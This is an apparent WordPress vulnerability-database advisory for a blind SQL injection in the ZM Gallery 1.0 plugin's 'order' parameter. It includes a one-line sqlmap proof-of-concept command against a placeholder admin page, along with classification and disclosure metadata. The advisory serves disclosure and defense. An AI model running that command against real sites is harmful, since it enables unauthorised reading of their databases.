ZM Gallery 1.0 – Authenticated Blind SQL Injection



Description
Type user access: admin user.

$_GET[‘order’] is escaped wrong. Attack with Blind Injection
Proof of Concept
python sqlmap.py -u "http://www.example.com/wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5 --dbms=mysql

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 4876
Verified No
WPVDB ID 8703

Timeline

Publicly Published 2016-12-14 (almost 3 years ago)
Added 2016-12-20 (almost 3 years ago)
Last Updated 2016-12-20 (almost 3 years ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin